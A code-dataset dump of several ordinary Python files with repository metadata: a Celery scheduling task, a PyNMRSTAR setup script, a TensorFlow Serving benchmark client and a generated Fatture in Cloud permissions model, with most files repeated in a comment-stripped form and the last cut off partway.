    # Only the first whitespace-separated token (the country) matters;
    # missing keys default to 0 via dict.get.
    country = sys.stdin.readline().split()[0]
    countries[country] = countries.get(country, 0) + 1
keys = sorted(countries.keys())
for k in keys:
    print('{} {}'.format(k,countries[k]))
| true | true |
f73256e3b561a6f89abbc2dc5ccfdde8a6475f77 | 1,135 | py | Python | portia_server/portia_dashboard/tasks.py | rmdes/portia-dashboard | 97e698c7232c15eff47d20fd3529251bbd284226 | [
"BSD-3-Clause"
] | 223 | 2018-01-22T07:43:58.000Z | 2022-03-25T12:52:30.000Z | portia_server/portia_dashboard/tasks.py | rmdes/portia-dashboard | 97e698c7232c15eff47d20fd3529251bbd284226 | [
"BSD-3-Clause"
] | 9 | 2018-03-17T15:16:26.000Z | 2019-11-11T09:35:04.000Z | portia_server/portia_dashboard/tasks.py | rmdes/portia-dashboard | 97e698c7232c15eff47d20fd3529251bbd284226 | [
"BSD-3-Clause"
] | 76 | 2018-01-22T04:20:00.000Z | 2021-11-13T09:53:26.000Z | from __future__ import absolute_import, unicode_literals
from django.conf import settings
from .models import Schedule
from celery.task.schedules import crontab
from celery import shared_task
from celery import task
import logging
import time, datetime
import requests
logger = logging.getLogger('portia_dashboard')
@task
def schedule_monitor():
    """Periodic Celery task: fire due `Schedule` entries against SCHEDULE_URL.

    A schedule is due when its interval (seconds) has elapsed since
    ``date_update`` (milliseconds) and it still has runs left: ``times > 0``
    is a countdown, ``times < 0`` means run forever, ``times == 0`` is
    exhausted.  ``start_time`` in the future defers the first run.
    """
    schedules = Schedule.objects.all()
    for schedule in schedules:
        now_ms = int(time.time() * 1000)
        interval_elapsed = now_ms - schedule.date_update > schedule.interval * 1000
        # times != 0 covers both the countdown (>0) and run-forever (<0) cases.
        if interval_elapsed and schedule.times != 0:
            if schedule.start_time > 0 and schedule.start_time > now_ms:
                # Scheduled first-run time not yet reached.
                continue
            schedule_data = {
                'project': schedule.project,
                'spider': schedule.spider
            }
            request = requests.post(settings.SCHEDULE_URL, data=schedule_data)
            if request.status_code == 200:
                # Only count a successful submission as a run.
                schedule.date_update = now_ms
                # Decrement only finite countdowns; negative means unlimited.
                schedule.times = schedule.times - 1 if schedule.times > 0 else schedule.times
                schedule.save()
| 31.527778 | 125 | 0.663436 | from __future__ import absolute_import, unicode_literals
from django.conf import settings
from .models import Schedule
from celery.task.schedules import crontab
from celery import shared_task
from celery import task
import logging
import time, datetime
import requests
logger = logging.getLogger('portia_dashboard')
@task
def schedule_monitor():
    """Periodic Celery task: fire due `Schedule` entries against SCHEDULE_URL.

    A schedule is due when its interval (seconds) has elapsed since
    ``date_update`` (milliseconds) and it still has runs left: ``times > 0``
    is a countdown, ``times < 0`` means run forever, ``times == 0`` is
    exhausted.  ``start_time`` in the future defers the first run.
    """
    schedules = Schedule.objects.all()
    for schedule in schedules:
        nowTimestamp = int(time.time() * 1000)
        # Due when the interval elapsed and times != 0 (countdown or forever).
        if (nowTimestamp - schedule.date_update > schedule.interval * 1000) and (schedule.times > 0 or schedule.times < 0 ) :
            if schedule.start_time > 0 and schedule.start_time > nowTimestamp:
                # Scheduled first-run time not yet reached.
                continue
            schedule_data = {
                'project': schedule.project,
                'spider': schedule.spider
            }
            request = requests.post(settings.SCHEDULE_URL, data=schedule_data)
            if request.status_code == 200:
                # Only count a successful submission as a run; negative
                # `times` (run forever) is never decremented.
                schedule.date_update = nowTimestamp
                schedule.times = schedule.times -1 if ( schedule.times > 0 ) else schedule.times
                schedule.save()
| true | true |
f7325868460a157150006054167b4d86c914b192 | 2,535 | py | Python | setup.py | uwbmrb/PyNMRSTAR | c6e3cdccb4aa44dfbc3b4e984837a6bcde3cf171 | [
"MIT"
] | 16 | 2017-02-02T05:00:50.000Z | 2021-05-25T11:13:15.000Z | setup.py | uwbmrb/PyNMRSTAR | c6e3cdccb4aa44dfbc3b4e984837a6bcde3cf171 | [
"MIT"
] | 29 | 2016-07-14T21:02:18.000Z | 2021-06-26T17:24:07.000Z | setup.py | bmrb-io/PyNMRSTAR | 55df5bf7de192e7a6c95f37e0756f09e3f504170 | [
"MIT"
] | 4 | 2016-04-14T16:29:49.000Z | 2017-02-28T02:01:57.000Z | #!/usr/bin/env python3
import os
from setuptools import setup, Extension
def get_version():
    """Extract ``__version__`` from pynmrstar/_internal.py without importing it.

    Raises:
        RuntimeError: if no ``__version__`` line is found.
    """
    package_root = os.path.abspath(os.path.dirname(__file__))
    internal_path = os.path.join(package_root, 'pynmrstar', '_internal.py')
    with open(internal_path, 'r') as handle:
        for source_line in handle:
            if not source_line.startswith('__version__'):
                continue
            # The version is quoted with either " or '; split on whichever.
            quote = '"' if '"' in source_line else "'"
            return source_line.split(quote)[1]
    raise RuntimeError("Unable to find version string.")
# Should fail if the readme is missing
long_des = open('README.rst', 'r').read()
# Optional C accelerator: setup still succeeds if it fails to build.
cnmrstar = Extension('cnmrstar',
                     sources=['c/cnmrstarmodule.c'],
                     extra_compile_args=["-funroll-loops", "-O3"],
                     optional=True)
setup(name='pynmrstar',
      version=get_version(),
      packages=['pynmrstar'],
      ext_modules=[cnmrstar],
      install_requires=['requests>=2.21.0,<=3'],
      python_requires='>=3.6',
      author='Jon Wedell',
      author_email='wedell@uchc.edu',
      description='PyNMR-STAR provides tools for reading, writing, modifying, and interacting with NMR-STAR files. '
                  'Maintained by the BMRB.',
      long_description=long_des,
      long_description_content_type='text/x-rst',
      keywords=['bmrb', 'parser', 'nmr', 'nmrstar', 'biomagresbank', 'biological magnetic resonance bank'],
      url='https://github.com/uwbmrb/PyNMRSTAR',
      license='MIT',
      # Bundled reference data the parser needs at runtime.
      package_data={'pynmrstar': ['reference_files/schema.csv',
                                  'reference_files/comments.str',
                                  'reference_files/data_types.csv']},
      classifiers=[
          'Development Status :: 6 - Mature',
          'Environment :: Console',
          'Programming Language :: Python :: 3 :: Only',
          'Programming Language :: Python :: 3.6',
          'Programming Language :: Python :: 3.7',
          'Programming Language :: Python :: 3.8',
          'Programming Language :: Python :: 3.9',
          'Intended Audience :: Developers',
          'License :: OSI Approved :: MIT License',
          'Natural Language :: English',
          'Operating System :: MacOS',
          'Operating System :: POSIX :: Linux',
          'Operating System :: Microsoft :: Windows',
          'Topic :: Scientific/Engineering :: Bio-Informatics',
          'Topic :: Software Development :: Libraries',
          'Topic :: Software Development :: Libraries :: Python Modules'
      ]
      )
| 39.609375 | 116 | 0.586588 |
import os
from setuptools import setup, Extension
def get_version():
    """Extract ``__version__`` from pynmrstar/_internal.py without importing it.

    Raises:
        RuntimeError: if no ``__version__`` line is found.
    """
    package_root = os.path.abspath(os.path.dirname(__file__))
    internal_path = os.path.join(package_root, 'pynmrstar', '_internal.py')
    with open(internal_path, 'r') as handle:
        for source_line in handle:
            if not source_line.startswith('__version__'):
                continue
            # The version is quoted with either " or '; split on whichever.
            quote = '"' if '"' in source_line else "'"
            return source_line.split(quote)[1]
    raise RuntimeError("Unable to find version string.")
# Should fail if the readme is missing
long_des = open('README.rst', 'r').read()
# Optional C accelerator: setup still succeeds if it fails to build.
cnmrstar = Extension('cnmrstar',
                     sources=['c/cnmrstarmodule.c'],
                     extra_compile_args=["-funroll-loops", "-O3"],
                     optional=True)
setup(name='pynmrstar',
      version=get_version(),
      packages=['pynmrstar'],
      ext_modules=[cnmrstar],
      install_requires=['requests>=2.21.0,<=3'],
      python_requires='>=3.6',
      author='Jon Wedell',
      author_email='wedell@uchc.edu',
      description='PyNMR-STAR provides tools for reading, writing, modifying, and interacting with NMR-STAR files. '
                  'Maintained by the BMRB.',
      long_description=long_des,
      long_description_content_type='text/x-rst',
      keywords=['bmrb', 'parser', 'nmr', 'nmrstar', 'biomagresbank', 'biological magnetic resonance bank'],
      url='https://github.com/uwbmrb/PyNMRSTAR',
      license='MIT',
      # Bundled reference data the parser needs at runtime.
      package_data={'pynmrstar': ['reference_files/schema.csv',
                                  'reference_files/comments.str',
                                  'reference_files/data_types.csv']},
      classifiers=[
          'Development Status :: 6 - Mature',
          'Environment :: Console',
          'Programming Language :: Python :: 3 :: Only',
          'Programming Language :: Python :: 3.6',
          'Programming Language :: Python :: 3.7',
          'Programming Language :: Python :: 3.8',
          'Programming Language :: Python :: 3.9',
          'Intended Audience :: Developers',
          'License :: OSI Approved :: MIT License',
          'Natural Language :: English',
          'Operating System :: MacOS',
          'Operating System :: POSIX :: Linux',
          'Operating System :: Microsoft :: Windows',
          'Topic :: Scientific/Engineering :: Bio-Informatics',
          'Topic :: Software Development :: Libraries',
          'Topic :: Software Development :: Libraries :: Python Modules'
      ]
      )
| true | true |
f73258eae4d5169d7051cca79bea9e0c5febac33 | 20 | py | Python | upconvert/parser/t/__init__.py | lehaianh1986/schematic-file-converter | ed67274511a5b0e1b378e4e0fd3943ec8a189f43 | [
"Apache-2.0"
] | 29 | 2016-05-19T02:04:51.000Z | 2021-09-16T06:25:59.000Z | upconvert/parser/t/__init__.py | 84ace/schematic-file-converter | a5975a521d842396605c05a9f197bfe088906bb4 | [
"Apache-2.0"
] | null | null | null | upconvert/parser/t/__init__.py | 84ace/schematic-file-converter | a5975a521d842396605c05a9f197bfe088906bb4 | [
"Apache-2.0"
] | 24 | 2016-05-19T02:05:00.000Z | 2022-01-14T18:20:01.000Z | """ Parser tests """ | 20 | 20 | 0.55 | true | true | |
f732596a48cb52363db0bf4dd853807f96f22319 | 4,315 | py | Python | benchmarks/image_recognition/tensorflow_serving/inceptionv3/inference/fp32/image_recognition_benchmark.py | hekaplex/resnet_dl | fc8d4dcc0adffbe22d01d333e6cf5db955f2f011 | [
"Apache-2.0"
] | null | null | null | benchmarks/image_recognition/tensorflow_serving/inceptionv3/inference/fp32/image_recognition_benchmark.py | hekaplex/resnet_dl | fc8d4dcc0adffbe22d01d333e6cf5db955f2f011 | [
"Apache-2.0"
] | null | null | null | benchmarks/image_recognition/tensorflow_serving/inceptionv3/inference/fp32/image_recognition_benchmark.py | hekaplex/resnet_dl | fc8d4dcc0adffbe22d01d333e6cf5db955f2f011 | [
"Apache-2.0"
] | null | null | null | #
# -*- coding: utf-8 -*-
#
# Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: EPL-2.0
#
"""Send simulated image data to tensorflow_model_server loaded with ResNet50 or InceptionV3 model.
"""
from __future__ import print_function
import os
import random
import grpc
import numpy as np
import sys
import tensorflow as tf
import tensorflow.compat.v1 as tf_v1
import time
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2_grpc
from util import preprocess_image, parse_example_proto
tf_v1.disable_eager_execution()
tf_v1.app.flags.DEFINE_string('server', 'localhost:8500', 'PredictionService host:port')
tf_v1.app.flags.DEFINE_integer('batch_size', 1, 'Batch size to use')
tf_v1.app.flags.DEFINE_string('data_dir', '', 'path to images in TF records format')
tf_v1.app.flags.DEFINE_string('model', 'resnet50', 'Name of model (resnet50 or inceptionv3).')
FLAGS = tf_v1.app.flags.FLAGS
def sample_images(image_size):
    """Pull a random batch of images from FLAGS.data_dir containing TF record formatted ImageNet validation set

    Args:
        image_size: height/width in pixels to which each image is preprocessed.

    Returns:
        ndarray of float32 with shape [FLAGS.batch_size, image_size, image_size, 3]
    """
    # Pick one TFRecord shard at random from the validation directory.
    sample_file = random.choice(os.listdir(FLAGS.data_dir))
    dataset = tf.data.TFRecordDataset(os.path.join(FLAGS.data_dir, sample_file))
    # BUG FIX: the original code called .shuffle(True); True coerces to a
    # buffer_size of 1, which performs no shuffling at all.  Use a real
    # buffer so the sampled batch is actually randomized.
    dataset = (dataset.map(lambda x: parse_example_proto(x))
               .shuffle(buffer_size=1024)
               .batch(FLAGS.batch_size))
    # Eager execution is disabled at module load, so use the compat.v1
    # graph-mode iterator/Session APIs consistently (tf.Session and
    # Dataset.make_one_shot_iterator do not exist under TF2).
    iterator = tf_v1.data.make_one_shot_iterator(dataset)
    next_element = iterator.get_next()
    with tf_v1.Session() as sess:
        images, _labels = sess.run(next_element)
        images = np.array([sess.run(preprocess_image(x, FLAGS.model, image_size)) for x in images])
    return images
def main(_):
    """Benchmark a TF Serving image-recognition model over gRPC.

    Issues 40 Predict requests; the first 10 are warm-up iterations and are
    excluded from the reported average latency / throughput.
    """
    model_image_sizes = {'resnet50': 224, 'inceptionv3': 299}
    if FLAGS.model not in model_image_sizes:
        print('Please specify model as either resnet50 or inceptionv3.')
        sys.exit(-1)
    image_size = model_image_sizes[FLAGS.model]

    channel = grpc.insecure_channel(FLAGS.server)
    stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)

    num_iteration = 40
    warm_up_iteration = 10
    total_time = 0
    for i in range(1, num_iteration + 1):
        # Either sample real validation images or synthesize a random batch.
        if FLAGS.data_dir:
            image_np = sample_images(image_size)
        else:
            image_np = np.random.rand(FLAGS.batch_size, image_size, image_size, 3).astype(np.float32)
        # Rescale to the value range each model expects.
        if FLAGS.model == 'resnet50':
            # For ResNet50, rescale to [0, 256]
            image_np *= 256.0
        elif FLAGS.model == 'inceptionv3':
            # For InceptionV3, rescale to [-1, 1]
            image_np = (image_np - 0.5) * 2.0

        request = predict_pb2.PredictRequest()
        request.model_spec.name = FLAGS.model
        request.model_spec.signature_name = 'serving_default'
        request.inputs['input'].CopyFrom(
            tf.make_tensor_proto(image_np, shape=[FLAGS.batch_size, image_size, image_size, 3]))

        start_time = time.time()
        stub.Predict(request, 10.0)  # 10 secs timeout
        time_consume = time.time() - start_time
        print('Iteration %d: %.3f sec' % (i, time_consume))
        if i > warm_up_iteration:
            total_time += time_consume

    time_average = total_time / (num_iteration - warm_up_iteration)
    print('Average time: %.3f sec' % (time_average))
    print('Batch size = %d' % FLAGS.batch_size)
    if FLAGS.batch_size == 1:
        print('Latency: %.3f ms' % (time_average * 1000))
    print('Throughput: %.3f images/sec' % (FLAGS.batch_size / time_average))
if __name__ == '__main__':
tf_v1.app.run()
| 35.958333 | 112 | 0.672074 |
from __future__ import print_function
import os
import random
import grpc
import numpy as np
import sys
import tensorflow as tf
import tensorflow.compat.v1 as tf_v1
import time
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2_grpc
from util import preprocess_image, parse_example_proto
tf_v1.disable_eager_execution()
tf_v1.app.flags.DEFINE_string('server', 'localhost:8500', 'PredictionService host:port')
tf_v1.app.flags.DEFINE_integer('batch_size', 1, 'Batch size to use')
tf_v1.app.flags.DEFINE_string('data_dir', '', 'path to images in TF records format')
tf_v1.app.flags.DEFINE_string('model', 'resnet50', 'Name of model (resnet50 or inceptionv3).')
FLAGS = tf_v1.app.flags.FLAGS
def sample_images(image_size):
sample_file = random.choice(os.listdir(FLAGS.data_dir))
dataset = tf.data.TFRecordDataset(os.path.join(FLAGS.data_dir, sample_file))
dataset = dataset.map(lambda x: parse_example_proto(x)).shuffle(True).batch(FLAGS.batch_size)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with tf.Session() as sess:
images, labels = sess.run(next_element)
images = np.array([sess.run(preprocess_image(x, FLAGS.model, image_size)) for x in images])
return images
def main(_):
if FLAGS.model == 'resnet50':
image_size = 224
elif FLAGS.model == 'inceptionv3':
image_size = 299
else:
print('Please specify model as either resnet50 or inceptionv3.')
sys.exit(-1)
channel = grpc.insecure_channel(FLAGS.server)
stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
i = 0
num_iteration = 40
warm_up_iteration = 10
total_time = 0
for _ in range(num_iteration):
i += 1
if FLAGS.data_dir:
image_np = sample_images(image_size)
else:
image_np = np.random.rand(FLAGS.batch_size, image_size, image_size, 3).astype(np.float32)
if FLAGS.model == 'resnet50':
image_np *= 256.0
elif FLAGS.model == 'inceptionv3':
image_np = (image_np - 0.5) * 2.0
request = predict_pb2.PredictRequest()
request.model_spec.name = FLAGS.model
request.model_spec.signature_name = 'serving_default'
request.inputs['input'].CopyFrom(
tf.make_tensor_proto(image_np, shape=[FLAGS.batch_size, image_size, image_size, 3]))
start_time = time.time()
stub.Predict(request, 10.0)
time_consume = time.time() - start_time
print('Iteration %d: %.3f sec' % (i, time_consume))
if i > warm_up_iteration:
total_time += time_consume
time_average = total_time / (num_iteration - warm_up_iteration)
print('Average time: %.3f sec' % (time_average))
print('Batch size = %d' % FLAGS.batch_size)
if (FLAGS.batch_size == 1):
print('Latency: %.3f ms' % (time_average * 1000))
print('Throughput: %.3f images/sec' % (FLAGS.batch_size / time_average))
if __name__ == '__main__':
tf_v1.app.run()
| true | true |
f7325b9e40c3db2e572ba5e1f7ec33a8559aa03b | 18,306 | py | Python | fattureincloud_python_sdk/model/permissions.py | fattureincloud/fattureincloud-python-sdk | f3a40fac345751014ea389680efdaef90f03bac1 | [
"MIT"
] | 2 | 2022-02-17T08:33:17.000Z | 2022-03-22T09:27:00.000Z | fattureincloud_python_sdk/model/permissions.py | fattureincloud/fattureincloud-python-sdk | f3a40fac345751014ea389680efdaef90f03bac1 | [
"MIT"
] | null | null | null | fattureincloud_python_sdk/model/permissions.py | fattureincloud/fattureincloud-python-sdk | f3a40fac345751014ea389680efdaef90f03bac1 | [
"MIT"
] | null | null | null | """
Fatture in Cloud API v2 - API Reference
Connect your software with Fatture in Cloud, the invoicing platform chosen by more than 400.000 businesses in Italy. The Fatture in Cloud API is based on REST, and makes possible to interact with the user related data prior authorization via OAuth2 protocol. # noqa: E501
The version of the OpenAPI document: 2.0.15
Contact: info@fattureincloud.it
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from fattureincloud_python_sdk.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from fattureincloud_python_sdk.exceptions import ApiAttributeError
def lazy_import():
    """Import the referenced model classes on first use and publish them into
    module globals.

    Generated OpenAPI models can reference each other circularly; deferring
    these imports until after module load breaks the import cycle.
    """
    from fattureincloud_python_sdk.model.permission_level import PermissionLevel
    from fattureincloud_python_sdk.model.permissions_fic_issued_documents_detailed import PermissionsFicIssuedDocumentsDetailed
    globals()['PermissionLevel'] = PermissionLevel
    globals()['PermissionsFicIssuedDocumentsDetailed'] = PermissionsFicIssuedDocumentsDetailed
class Permissions(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = True
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'fic_situation': (PermissionLevel,), # noqa: E501
'fic_clients': (PermissionLevel,), # noqa: E501
'fic_suppliers': (PermissionLevel,), # noqa: E501
'fic_products': (PermissionLevel,), # noqa: E501
'fic_issued_documents': (PermissionLevel,), # noqa: E501
'fic_received_documents': (PermissionLevel,), # noqa: E501
'fic_receipts': (PermissionLevel,), # noqa: E501
'fic_calendar': (PermissionLevel,), # noqa: E501
'fic_archive': (PermissionLevel,), # noqa: E501
'fic_taxes': (PermissionLevel,), # noqa: E501
'fic_stock': (PermissionLevel,), # noqa: E501
'fic_cashbook': (PermissionLevel,), # noqa: E501
'fic_settings': (PermissionLevel,), # noqa: E501
'fic_emails': (PermissionLevel,), # noqa: E501
'fic_export': (PermissionLevel,), # noqa: E501
'fic_import_bankstatements': (PermissionLevel,), # noqa: E501
'fic_import_clients_suppliers': (PermissionLevel,), # noqa: E501
'fic_import_issued_documents': (PermissionLevel,), # noqa: E501
'fic_import_products': (PermissionLevel,), # noqa: E501
'fic_recurring': (PermissionLevel,), # noqa: E501
'fic_riba': (PermissionLevel,), # noqa: E501
'dic_employees': (PermissionLevel,), # noqa: E501
'dic_settings': (PermissionLevel,), # noqa: E501
'dic_timesheet': (PermissionLevel,), # noqa: E501
'fic_issued_documents_detailed': (PermissionsFicIssuedDocumentsDetailed,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'fic_situation': 'fic_situation', # noqa: E501
'fic_clients': 'fic_clients', # noqa: E501
'fic_suppliers': 'fic_suppliers', # noqa: E501
'fic_products': 'fic_products', # noqa: E501
'fic_issued_documents': 'fic_issued_documents', # noqa: E501
'fic_received_documents': 'fic_received_documents', # noqa: E501
'fic_receipts': 'fic_receipts', # noqa: E501
'fic_calendar': 'fic_calendar', # noqa: E501
'fic_archive': 'fic_archive', # noqa: E501
'fic_taxes': 'fic_taxes', # noqa: E501
'fic_stock': 'fic_stock', # noqa: E501
'fic_cashbook': 'fic_cashbook', # noqa: E501
'fic_settings': 'fic_settings', # noqa: E501
'fic_emails': 'fic_emails', # noqa: E501
'fic_export': 'fic_export', # noqa: E501
'fic_import_bankstatements': 'fic_import_bankstatements', # noqa: E501
'fic_import_clients_suppliers': 'fic_import_clients_suppliers', # noqa: E501
'fic_import_issued_documents': 'fic_import_issued_documents', # noqa: E501
'fic_import_products': 'fic_import_products', # noqa: E501
'fic_recurring': 'fic_recurring', # noqa: E501
'fic_riba': 'fic_riba', # noqa: E501
'dic_employees': 'dic_employees', # noqa: E501
'dic_settings': 'dic_settings', # noqa: E501
'dic_timesheet': 'dic_timesheet', # noqa: E501
'fic_issued_documents_detailed': 'fic_issued_documents_detailed', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""Permissions - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
fic_situation (PermissionLevel): [optional] # noqa: E501
fic_clients (PermissionLevel): [optional] # noqa: E501
fic_suppliers (PermissionLevel): [optional] # noqa: E501
fic_products (PermissionLevel): [optional] # noqa: E501
fic_issued_documents (PermissionLevel): [optional] # noqa: E501
fic_received_documents (PermissionLevel): [optional] # noqa: E501
fic_receipts (PermissionLevel): [optional] # noqa: E501
fic_calendar (PermissionLevel): [optional] # noqa: E501
fic_archive (PermissionLevel): [optional] # noqa: E501
fic_taxes (PermissionLevel): [optional] # noqa: E501
fic_stock (PermissionLevel): [optional] # noqa: E501
fic_cashbook (PermissionLevel): [optional] # noqa: E501
fic_settings (PermissionLevel): [optional] # noqa: E501
fic_emails (PermissionLevel): [optional] # noqa: E501
fic_export (PermissionLevel): [optional] # noqa: E501
fic_import_bankstatements (PermissionLevel): [optional] # noqa: E501
fic_import_clients_suppliers (PermissionLevel): [optional] # noqa: E501
fic_import_issued_documents (PermissionLevel): [optional] # noqa: E501
fic_import_products (PermissionLevel): [optional] # noqa: E501
fic_recurring (PermissionLevel): [optional] # noqa: E501
fic_riba (PermissionLevel): [optional] # noqa: E501
dic_employees (PermissionLevel): [optional] # noqa: E501
dic_settings (PermissionLevel): [optional] # noqa: E501
dic_timesheet (PermissionLevel): [optional] # noqa: E501
fic_issued_documents_detailed (PermissionsFicIssuedDocumentsDetailed): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""Permissions - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
fic_situation (PermissionLevel): [optional] # noqa: E501
fic_clients (PermissionLevel): [optional] # noqa: E501
fic_suppliers (PermissionLevel): [optional] # noqa: E501
fic_products (PermissionLevel): [optional] # noqa: E501
fic_issued_documents (PermissionLevel): [optional] # noqa: E501
fic_received_documents (PermissionLevel): [optional] # noqa: E501
fic_receipts (PermissionLevel): [optional] # noqa: E501
fic_calendar (PermissionLevel): [optional] # noqa: E501
fic_archive (PermissionLevel): [optional] # noqa: E501
fic_taxes (PermissionLevel): [optional] # noqa: E501
fic_stock (PermissionLevel): [optional] # noqa: E501
fic_cashbook (PermissionLevel): [optional] # noqa: E501
fic_settings (PermissionLevel): [optional] # noqa: E501
fic_emails (PermissionLevel): [optional] # noqa: E501
fic_export (PermissionLevel): [optional] # noqa: E501
fic_import_bankstatements (PermissionLevel): [optional] # noqa: E501
fic_import_clients_suppliers (PermissionLevel): [optional] # noqa: E501
fic_import_issued_documents (PermissionLevel): [optional] # noqa: E501
fic_import_products (PermissionLevel): [optional] # noqa: E501
fic_recurring (PermissionLevel): [optional] # noqa: E501
fic_riba (PermissionLevel): [optional] # noqa: E501
dic_employees (PermissionLevel): [optional] # noqa: E501
dic_settings (PermissionLevel): [optional] # noqa: E501
dic_timesheet (PermissionLevel): [optional] # noqa: E501
fic_issued_documents_detailed (PermissionsFicIssuedDocumentsDetailed): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| 50.709141 | 278 | 0.60106 |
import re
import sys
from fattureincloud_python_sdk.model_utils import (
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from fattureincloud_python_sdk.exceptions import ApiAttributeError
def lazy_import():
from fattureincloud_python_sdk.model.permission_level import PermissionLevel
